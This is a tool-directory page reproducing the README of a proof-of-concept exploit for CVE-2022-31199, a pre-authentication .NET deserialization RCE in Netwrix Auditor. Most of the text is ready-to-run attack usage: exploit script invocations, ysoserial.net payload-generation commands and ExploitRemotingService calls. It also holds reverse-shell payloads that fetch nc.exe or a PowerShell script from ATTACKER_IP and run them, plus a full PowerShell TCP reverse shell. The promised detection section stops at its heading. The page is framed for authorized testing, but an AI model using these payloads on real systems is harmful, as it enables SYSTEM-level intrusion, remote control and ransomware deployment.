Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Submit
ToolsExploitsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2022-31199 — Proof-of-concept exploits for CVE-2022-31199, a critical .NET deserialization RCE in Netwrix Auditor. Includes Python and PowerShell scripts, payload generation with ysoserial.net, and detection signatures for authorized security testing. | Kitploit
Tools/GitHubGitHub/developerfred/cve-2022-31199
Vulnerability AnalysisExploitationPenetration TestingCommand and ControlLearning & EducationRed TeamingPayload DevelopmentLabs & Practice
GitHub
developerfred/cve-2022-31199

CVE-2022-31199

Proof-of-concept exploits for CVE-2022-31199, a critical .NET deserialization RCE in Netwrix Auditor. Includes Python and PowerShell scripts, payload generation with ysoserial.net, and detection signatures for authorized security testing.

View Repository
1310 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2022-31199 - Netwrix Auditor RCE Exploit POCs

🔍 Vulnerability Overview

CVE-2022-31199 is a critical insecure object deserialization vulnerability in Netwrix Auditor versions prior to 10.5. The vulnerability exists in an unsecured .NET Remoting service listening on TCP port 9004, allowing unauthenticated remote attackers to achieve arbitrary code execution with NT AUTHORITY\SYSTEM privileges.

Vulnerability Details

  • CVE ID: CVE-2022-31199
  • CVSS Score: 9.8 (Critical)
  • CWE: CWE-502 (Deserialization of Untrusted Data)
  • Affected Versions: Netwrix Auditor < 10.5
  • Attack Vector: Network (Unauthenticated)
  • Privileges Required: None
  • Impact: Complete system compromise with SYSTEM privileges
  • CISA KEV: Listed in Known Exploited Vulnerabilities Catalog

Real-World Impact

This vulnerability has been actively exploited in the wild by:

  • Truebot malware campaign (Russian-affiliated CL0P/TA505 ransomware operators)
  • Silence cybercriminal group
  • FIN11 threat actors

Successful exploitation typically leads to:

  • Full Active Directory domain compromise
  • Lateral movement across monitored systems
  • Data exfiltration
  • Ransomware deployment

📦 Repository Contents

This Repo contains complete Proof of Concept (POC) exploits for CVE-2022-31199:

Files

  1. exploit.py - Python-based exploitation framework
  2. exploit.ps1 - PowerShell exploitation script
  3. README.md - This documentation
  4. manual-exploitation.md - Step-by-step manual exploitation guide

🛠️ Requirements

Tools Required

Windows-based Exploitation (Recommended)

  • ysoserial.net - .NET deserialization payload generator

    • Download: https://github.com/pwntester/ysoserial.net
    • Releases: https://github.com/pwntester/ysoserial.net/releases
  • ExploitRemotingService - .NET Remoting exploitation tool

    • Download: https://github.com/tyranid/ExploitRemotingService
    • Alternative (enhanced): https://github.com/codewhitesec/ExploitRemotingService

Python Script Requirements

  • Python 3.6 or higher
  • Standard library only (no external dependencies for basic checks)
  • Access to ysoserial.net and ExploitRemotingService executables

PowerShell Script Requirements

  • PowerShell 5.1 or higher
  • Windows operating system
  • ysoserial.exe and ExploitRemotingService.exe in script directory

🚀 Quick Start

1. Check if Target is Vulnerable

Using Python:

python3 exploit.py --target 192.168.1.100 --check

Using PowerShell:

.\exploit.ps1 -Target 192.168.1.100 -CheckOnly

2. Generate Payload

# Using ysoserial.net
ysoserial.exe -f BinaryFormatter -o base64 -g TypeConfuseDelegate -c "whoami"

3. Execute Exploit

Python (with pre-generated payload):

python3 exploit.py --target 192.168.1.100 --payload [BASE64_PAYLOAD]

PowerShell (automatic):

.\exploit.ps1 -Target 192.168.1.100 -Command "whoami"

📖 Detailed Usage

Python Exploit (exploit.py)

Basic Vulnerability Check

python3 exploit.py --target 10.10.10.100 --check

Full Exploitation with Custom Payload

# Step 1: Generate payload
ysoserial.exe -f BinaryFormatter -o base64 -g TypeConfuseDelegate -c "cmd /c whoami > C:\temp\output.txt"

# Step 2: Execute exploit
python3 exploit.py --target 10.10.10.100 --payload AAEAAAD....[base64_payload]

Advanced Options

# Custom port
python3 exploit.py --target 10.10.10.100 --port 9004 --check

# Custom endpoint
python3 exploit.py --target 10.10.10.100 --endpoint UAVRServer --check

Command Line Arguments

--target    : Target IP address or hostname (required)
--port      : Target port (default: 9004)
--endpoint  : .NET Remoting endpoint name (default: UAVRServer)
--check     : Only check vulnerability, don't exploit
--payload   : Base64 encoded payload from ysoserial.net

PowerShell Exploit (exploit.ps1)

Vulnerability Check Only

.\exploit.ps1 -Target 192.168.1.100 -CheckOnly

Execute Command

# Simple command execution
.\exploit.ps1 -Target 192.168.1.100 -Command "whoami"

# Write output to file
.\exploit.ps1 -Target 192.168.1.100 -Command "cmd /c whoami > C:\temp\out.txt"

# Custom port
.\exploit.ps1 -Target 192.168.1.100 -Port 9004 -Command "hostname"

Parameters

-Target     : Target IP address or hostname (required)
-Port       : Target port (default: 9004)
-Command    : Command to execute on target (default: "whoami")
-CheckOnly  : Only check vulnerability, don't exploit

🎯 Exploitation Examples

Example 1: Information Gathering

# Check system information
ysoserial.exe -f BinaryFormatter -o base64 -g TypeConfuseDelegate -c "cmd /c systeminfo > C:\temp\sysinfo.txt"

Example 2: Reverse Shell

Setup listener:

nc -lvnp 4444

Generate payload:

ysoserial.exe -f BinaryFormatter -o base64 -g TypeConfuseDelegate -c "powershell -c curl http://ATTACKER_IP/nc.exe -o C:\temp\nc.exe; C:\temp\nc.exe ATTACKER_IP 4444 -e cmd.exe"

Example 3: PowerShell Reverse Shell

Create reverse shell script (rev.ps1):

$client = New-Object System.Net.Sockets.TCPClient('ATTACKER_IP',4444);
$stream = $client.GetStream();
[byte[]]$bytes = 0..65535|%{0};
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){
    $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);
    $sendback = (iex $data 2>&1 | Out-String );
    $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';
    $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
    $stream.Write($sendbyte,0,$sendbyte.Length);
    $stream.Flush()
};
$client.Close()

Host the script:

python3 -m http.server 8000

Generate payload:

ysoserial.exe -f BinaryFormatter -o base64 -g TypeConfuseDelegate -c "powershell IEX (New-Object Net.WebClient).DownloadString('http://ATTACKER_IP:8000/rev.ps1')"

Example 4: Using ExploitRemotingService Directly

# Test connectivity
ExploitRemotingService.exe tcp://192.168.1.100:9004/UAVRServer ver

# Execute with lease mode (bypasses some protections)
ExploitRemotingService.exe -uselease tcp://192.168.1.100:9004/UAVRServer ls C:\

# Execute with object reference
ExploitRemotingService.exe -useobjref tcp://192.168.1.100:9004/UAVRServer exec "whoami"

🔬 Technical Details

Vulnerability Root Cause

The vulnerability stems from:

  1. Unsecured .NET Remoting endpoint on TCP port 9004
  2. BinaryFormatter deserialization without proper type filtering
  3. UAVRServer service accepting arbitrary serialized objects
  4. Service running with SYSTEM privileges in typical deployments

Exploitation Process

1. Attacker connects to TCP port 9004
2. Identifies .NET Remoting service (UAVRServer endpoint)
3. Generates malicious serialized payload using ysoserial.net
4. Sends payload via .NET Remoting protocol
5. Target deserializes object using BinaryFormatter
6. Gadget chain executes arbitrary code
7. Code runs with NT AUTHORITY\SYSTEM privileges

Supported Gadget Chains

The following ysoserial.net gadgets work against this vulnerability:

  • TypeConfuseDelegate (recommended)
  • ObjectDataProvider
  • PSObject
  • WindowsIdentity
  • TextFormattingRunProperties

Network Protocol

.NET Remoting Protocol Structure:
┌─────────────────────────────────────┐
│ Preamble (8 bytes)                  │
│ 0x00 0x01 0x00 0x00 0x01 0x00 0x00 │
├─────────────────────────────────────┤
│ Headers                             │
├─────────────────────────────────────┤
│ URI (UAVRServer)                    │
├─────────────────────────────────────┤
│ Serialized Object (BinaryFormatter) │
└─────────────────────────────────────┘

🛡️ Detection

Network Indicators

Download Tool